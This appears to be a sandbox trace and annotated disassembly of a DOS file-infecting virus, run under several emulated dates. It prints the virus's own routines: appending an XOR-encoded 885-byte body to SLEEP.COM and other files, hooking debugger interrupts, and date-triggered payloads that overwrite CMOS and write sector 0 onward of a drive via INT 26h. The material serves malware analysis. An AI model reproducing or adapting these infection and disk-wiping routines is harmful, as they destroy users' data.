0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:55.321203878Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:55.338879565Z 62 PC: 12dab | Close file
2018-12-25T12:41:55.351731893Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.355532651Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.36278943Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.369987805Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.372532367Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.373997723Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.377057052Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.380529389Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.383598172Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.392719302Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.402186671Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.404752672Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.409933338Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.414871182Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.418671329Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.420146808Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.422248834Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.424743214Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.426626314Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.433715089Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.443418767Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.446382196Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.453673196Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.461399164Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.462985813Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.464583377Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.469031546Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.471230208Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.474275491Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.484113726Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.495349727Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.498336105Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.506565497Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.514960367Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.525879045Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.527602186Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.531417678Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.533468728Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.536763859Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.547559765Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.557407876Z 26 PC: 12aeb | Set disk transfer address
2018-12-25T12:41:55.558775451Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e
0x12b04: mov ah, 0x2a
0x12b06: int 0x21
0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
2018-12-25T12:41:55.561863905Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b
0x12b15: mov ah, 0x2a
0x12b17: int 0x21
0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
2018-12-25T12:41:55.565321122Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b
0x12b21: mov ah, 0x2c
0x12b23: int 0x21
0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
2018-12-25T12:41:55.567886881Z 19 PC: 12b55 | Delete file
2018-12-25T12:41:55.575263511Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19
0x12b28: jge 0x12b2d
0x12b2a: call 0x12b7e
0x12b2d: ret
0x12b2e: mov al, 0x25
0x12b30: out 0x70, al
0x12b32: out 0x71, al
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30
0x12b3a: ret
0x12b3b: mov ah, 0x19
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111
0x12b42: mov dx, 0
0x12b45: int 0x26
0x12b47: add sp, 2
0x12b4a: ret
0x12b4b: mov ah, 0x13
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:55.244366036Z 26 PC: 12a73 | Set disk transfer address
2018-12-25T12:41:55.246260452Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:41:55.253835414Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:41:55.254940107Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:55.261700592Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:55.268639554Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:55.274802507Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:55.276425842Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:55.278551521Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:55.281391895Z 66 PC: 12d8e | Move file pointer
2018-12-25T12:41:55.282940374Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl
0x12d96: call 0x12dac
0x12d99: mov ah, 0x40
0x12d9b: mov cx, 0x375
0x12d9e: lea dx, word ptr [bp + 0x106]
0x12da2: int 0x21
0x12da4: call 0x12dac
0x12da7: mov ah, 0x3e
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120]
0x12db0: mov cx, 0x336
0x12db3: xor byte ptr [si], 0
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:55.285935226Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:55.300715361Z 62 PC: 12dab | Close file
2018-12-25T12:41:55.308732677Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.312260982Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.318637791Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.329662493Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.336931Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.339003869Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.349251778Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.351342108Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.354229359Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.366565844Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.388751574Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.392283219Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.398789417Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.405545518Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.407610193Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.409163674Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.412058175Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.41468547Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.417422328Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.425785465Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.434948912Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.437751865Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.444337712Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.451388541Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.452992701Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.454569418Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.458174283Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.459777884Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.46231522Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.471648696Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.479917999Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.482447775Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.489662443Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.496034612Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.497744453Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.50010504Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.503195154Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.504889853Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.507593653Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.516892224Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.525096529Z 26 PC: 12aeb | Set disk transfer address
; Payload trigger checks; after INT 21h AH=2Ah, DH = month and DL = day.
2018-12-25T12:41:55.526513151Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7 ; month == 7 (July)?
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe ; day == 14?
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e ; 14 July only: 0x12b2e is the port 0x70/0x71 write loop
0x12b04: mov ah, 0x2a ; INT 21h AH=2Ah: get date again
0x12b06: int 0x21
0x12b08: cmp dh, 0xb ; month < 11 -> skip
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8 ; day < 8 -> skip
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b ; month >= 11 and day >= 8: 0x12b3b is the INT 26h absolute-write routine
0x12b15: mov ah, 0x2a ; INT 21h AH=2Ah: get date
0x12b17: int 0x21
0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second vs 25; the branch is past this excerpt
; Later date checks, the time check, and the start of the port 0x70/0x71 loop; DH = month, DL = day.
2018-12-25T12:41:55.529910536Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb ; month < 11 -> skip
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8 ; day < 8 -> skip
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b ; month >= 11 and day >= 8: 0x12b3b is the INT 26h absolute-write routine
0x12b15: mov ah, 0x2a ; INT 21h AH=2Ah: get date
0x12b17: int 0x21
0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
; Third date check, time check, the port 0x70/0x71 loop, and the set-up for INT 26h; DH = month.
2018-12-25T12:41:55.532351601Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30 ; repeats down to index 0x01; port I/O is not a DOS call, so expect no row for it in the syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19 ; INT 21h AH=19h: get current drive, returned in AL
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111 ; sector count (4369) for the INT 26h that follows at 0x12b45
0x12b42: mov dx, 0 ; starting logical sector 0
; Time check followed by the bodies of two date-triggered routines (CMOS port loop, INT 26h write).
2018-12-25T12:41:55.53478958Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30 ; repeats down to index 0x01; port I/O is not a DOS call, so expect no row for it in the syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19 ; INT 21h AH=19h: get current drive, returned in AL
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111 ; sector count (4369) for INT 26h
0x12b42: mov dx, 0 ; starting logical sector 0
0x12b45: int 0x26 ; DOS absolute disk write to drive AL; buffer DS:BX is not set in this excerpt
0x12b47: add sp, 2 ; INT 26h returns with the flags word still on the stack
0x12b4a: ret
0x12b4b: mov ah, 0x13 ; AH=13h is the DOS FCB delete function; the INT itself is past this excerpt
0x12b4d: push cs

{"DateBased":true,"Day":1,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:55.300587451Z 26 PC: 12a73 | Set disk transfer address
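2018-12-25T12:41:55.301909984Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input') [note: vector 1 is the CPU single-step trap; 'Character input' is the name of DOS function 01h, not of this interrupt]
2018-12-25T12:41:55.303402593Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input') [note: vector 3 is the breakpoint interrupt; 'Auxiliary input' is the name of DOS function 03h. Re-pointing vectors 1 and 3 is a common way to disturb a debugger]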
2018-12-25T12:41:55.304760748Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:55.31253305Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:55.32126209Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:55.328389002Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:55.329892086Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:55.332272224Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:55.335317436Z 66 PC: 12d8e | Move file pointer
; Append step of the infection routine: patch one byte, XOR the body, write 0x375 bytes, XOR back, close.
2018-12-25T12:41:55.336783124Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl ; DL comes from the Get time call traced on this line; target is likely the imm8 of the xor at 0x12db3 - TODO confirm bp
0x12d96: call 0x12dac ; first XOR pass, before the write
0x12d99: mov ah, 0x40 ; INT 21h AH=40h: write to file handle
0x12d9b: mov cx, 0x375 ; 0x375 = 885 bytes, the size the trace reports for this write
0x12d9e: lea dx, word ptr [bp + 0x106] ; buffer to write starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac ; second XOR pass over the same range undoes the first in memory
0x12da7: mov ah, 0x3e ; INT 21h AH=3Eh: close file handle
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120] ; XOR range starts 0x1a bytes into the write buffer
0x12db0: mov cx, 0x336 ; 0x336 = 822 bytes
0x12db3: xor byte ptr [si], 0 ; key operand reads 0 in this listing, which would leave the bytes unchanged
0x12db6: inc si
0x12db7: dec cx
0x12db8: jne 0x12db3
0x12dba: ret
0x12dbb: add word ptr [bx], di ; NOTE(review): bytes after the ret are probably data shown as instructions
0x12dbd: aas
0x12dbe: aas
2018-12-25T12:41:55.341584547Z 64 PC: 12da4 | Write file or device (Write 885 bytes on handle 5)
2018-12-25T12:41:55.365034146Z 62 PC: 12dab | Close file
2018-12-25T12:41:55.375261167Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.378436699Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.386606584Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.394597418Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.396018501Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.398082177Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.399995771Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.401587824Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.40489688Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.414930184Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.424002813Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.427544013Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.435837587Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.443221594Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.44575581Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.447268854Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.450098318Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.452181154Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.455615517Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.465088565Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.480142547Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.483035753Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.490152821Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.497587043Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.499142071Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.502796116Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.515486973Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.517350776Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.519920253Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.529446456Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.538588314Z 79 PC: 12ad1 | Find next file (See above)
2018-12-25T12:41:55.541381813Z 61 PC: 12d49 | Open file (See above)
2018-12-25T12:41:55.548862477Z 63 PC: 12d58 | Read file or device (See above)
2018-12-25T12:41:55.556318654Z 66 PC: 12d67 | Move file pointer (See above)
2018-12-25T12:41:55.557887872Z 66 PC: 12d76 | Move file pointer (See above)
2018-12-25T12:41:55.559322482Z 64 PC: 12d82 | Write file or device (See above)
2018-12-25T12:41:55.562685783Z 66 PC: 12d8e | Move file pointer (See above)
2018-12-25T12:41:55.564164854Z 44 PC: 12d92 | Get time (See above)
2018-12-25T12:41:55.56683728Z 64 PC: 12da4 | Write file or device (See above)
2018-12-25T12:41:55.576422772Z 62 PC: 12dab | Close file (See above)
2018-12-25T12:41:55.58582072Z 26 PC: 12aeb | Set disk transfer address
; Payload trigger checks; after INT 21h AH=2Ah, DH = month and DL = day.
2018-12-25T12:41:55.588336017Z 42 PC: 12af7 | Get date 0x12af7: cmp dh, 7 ; month == 7 (July)?
0x12afa: jne 0x12b04
0x12afc: cmp dl, 0xe ; day == 14?
0x12aff: jne 0x12b04
0x12b01: call 0x12b2e ; 14 July only: 0x12b2e is the port 0x70/0x71 write loop
0x12b04: mov ah, 0x2a ; INT 21h AH=2Ah: get date again
0x12b06: int 0x21
0x12b08: cmp dh, 0xb ; month < 11 -> skip
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8 ; day < 8 -> skip
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b ; month >= 11 and day >= 8: 0x12b3b is the INT 26h absolute-write routine
0x12b15: mov ah, 0x2a ; INT 21h AH=2Ah: get date
0x12b17: int 0x21
0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second vs 25; the branch is past this excerpt
; Later date checks, the time check, and the start of the port 0x70/0x71 loop; DH = month, DL = day.
2018-12-25T12:41:55.591544757Z 42 PC: 12b08 | Get date 0x12b08: cmp dh, 0xb ; month < 11 -> skip
0x12b0b: jl 0x12b15
0x12b0d: cmp dl, 8 ; day < 8 -> skip
0x12b10: jl 0x12b15
0x12b12: call 0x12b3b ; month >= 11 and day >= 8: 0x12b3b is the INT 26h absolute-write routine
0x12b15: mov ah, 0x2a ; INT 21h AH=2Ah: get date
0x12b17: int 0x21
0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
; Third date check, time check, the port 0x70/0x71 loop, and the set-up for INT 26h; DH = month.
2018-12-25T12:41:55.593999331Z 42 PC: 12b19 | Get date 0x12b19: cmp dh, 3 ; month < 3 -> skip
0x12b1c: jl 0x12b21
0x12b1e: call 0x12b4b ; month >= 3: 0x12b4b starts by loading AH=13h (DOS FCB delete)
0x12b21: mov ah, 0x2c ; INT 21h AH=2Ch: get time
0x12b23: int 0x21
0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30 ; repeats down to index 0x01; port I/O is not a DOS call, so expect no row for it in the syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19 ; INT 21h AH=19h: get current drive, returned in AL
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111 ; sector count (4369) for the INT 26h that follows at 0x12b45
0x12b42: mov dx, 0 ; starting logical sector 0
2018-12-25T12:41:55.596444559Z 19 PC: 12b55 | Delete file
; Time check followed by the bodies of two date-triggered routines (CMOS port loop, INT 26h write).
2018-12-25T12:41:55.603638177Z 44 PC: 12b25 | Get time 0x12b25: cmp dl, 0x19 ; DL = hundredths of a second, compared with 25
0x12b28: jge 0x12b2d ; 25 or more -> return
0x12b2a: call 0x12b7e ; target is not listed in the excerpts shown here
0x12b2d: ret
0x12b2e: mov al, 0x25 ; routine called from 0x12b01 on 14 July: AL starts at 0x25
0x12b30: out 0x70, al ; port 0x70: CMOS/RTC index register
0x12b32: out 0x71, al ; port 0x71: CMOS/RTC data register, written with the index value
0x12b34: dec al
0x12b36: cmp al, 0
0x12b38: jne 0x12b30 ; repeats down to index 0x01; port I/O is not a DOS call, so expect no row for it in the syscall table
0x12b3a: ret
0x12b3b: mov ah, 0x19 ; INT 21h AH=19h: get current drive, returned in AL
0x12b3d: int 0x21
0x12b3f: mov cx, 0x1111 ; sector count (4369) for INT 26h
0x12b42: mov dx, 0 ; starting logical sector 0
0x12b45: int 0x26 ; DOS absolute disk write to drive AL; buffer DS:BX is not set in this excerpt
0x12b47: add sp, 2 ; INT 26h returns with the flags word still on the stack
0x12b4a: ret
0x12b4b: mov ah, 0x13 ; AH=13h is the DOS FCB delete function; the INT itself is past this excerpt
0x12b4d: push cs

{"DateBased":true,"Day":14,"Month":7,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14874,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:41:55.306195111Z 26 PC: 12a73 | Set disk transfer address
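2018-12-25T12:41:55.307842074Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input') [note: vector 1 is the CPU single-step trap; 'Character input' is the name of DOS function 01h, not of this interrupt]
2018-12-25T12:41:55.30972276Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input') [note: vector 3 is the breakpoint interrupt; 'Auxiliary input' is the name of DOS function 03h. Re-pointing vectors 1 and 3 is a common way to disturb a debugger]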
2018-12-25T12:41:55.311366287Z 78 PC: 12ad1 | Find first file
2018-12-25T12:41:55.318123253Z 61 PC: 12d49 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:41:55.326078708Z 63 PC: 12d58 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:41:55.333875465Z 66 PC: 12d67 | Move file pointer
2018-12-25T12:41:55.33531355Z 66 PC: 12d76 | Move file pointer
2018-12-25T12:41:55.337935515Z 64 PC: 12d82 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:41:55.341080707Z 66 PC: 12d8e | Move file pointer
; Append step of the infection routine: patch one byte, XOR the body, write 0x375 bytes, XOR back, close.
2018-12-25T12:41:55.342717222Z 44 PC: 12d92 | Get time 0x12d92: mov byte ptr [bp + 0x475], dl ; DL comes from the Get time call traced on this line; target is likely the imm8 of the xor at 0x12db3 - TODO confirm bp
0x12d96: call 0x12dac ; first XOR pass, before the write
0x12d99: mov ah, 0x40 ; INT 21h AH=40h: write to file handle
0x12d9b: mov cx, 0x375 ; 0x375 = 885 bytes, the size the trace reports for this write
0x12d9e: lea dx, word ptr [bp + 0x106] ; buffer to write starts at bp+0x106
0x12da2: int 0x21
0x12da4: call 0x12dac ; second XOR pass over the same range undoes the first in memory
0x12da7: mov ah, 0x3e ; INT 21h AH=3Eh: close file handle
0x12da9: int 0x21
0x12dab: ret
0x12dac: lea si, word ptr [bp + 0x120] ; XOR range starts 0x1a bytes into the write buffer
0x12db0: mov cx, 0x336 ; 0x336 = 822 bytes
